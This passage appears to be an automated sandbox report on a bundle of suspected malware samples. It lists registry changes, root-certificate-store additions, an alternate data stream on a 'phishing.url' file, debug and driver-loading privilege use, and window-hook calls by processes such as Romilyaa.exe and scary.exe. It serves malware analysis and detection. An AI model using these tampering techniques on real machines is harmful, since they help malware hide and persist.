Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\FriendlyName = "DroidCam Source 2" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\CLSID\{860BB310-5D01-11d0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4aa8-BFA9-4B196644964C} C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\1.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\shell\open\command C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32 C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\ = "URL:psiphon" C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\InprocServer32\ = "C:\\Program Files (x86)\\DroidCam\\lib\\DroidCamFilter32.ax" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{860BB310-5D01-11D0-BD3B-00A0C911CE86}\Instance\{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}\CLSID = "{9E2FBAC0-C951-4AA8-BFA9-4B196644964C}" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_Classes\Local Settings C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000_CLASSES\psiphon\URL Protocol C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\REQUEST C:\Windows\SysWOW64\rundll32.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136\Blob = 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 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6 C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\SystemCertificates\ADDRESSBOOK\Certificates\0789B35FD5C2EF8142E6AAE3B58FFF14E4F13136 C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 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 C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 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 C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 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 C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\317A2AD07F2B335EF5A1C34E4B57E8B7D8F1FCA6\Blob = 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 C:\Users\Admin\AppData\Local\Temp\psiphon-tunnel-core.exe N/A

NTFS ADS

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\phishing.url:favicon C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Runs net.exe

Runs regedit.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\tasklist.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\Rover.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\scary.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\rundll32.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\SubDir\Romilyaa.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Program Files (x86)\DroidCam\lib\insdrv.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\DrvInst.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\system32\DrvInst.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-BFB59.tmp\WinaeroTweaker-1.40.0.0-setup.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Windows\system32\efsui.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\bloatware\3.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\vir_125c6bfb-ff7e-4372-a507-4b7e067f7f9d\f3cb220f1aaa32ca310586e5f62dcab1.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A
N/A N/A C:\Program Files\SubDir\Romilyaa.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
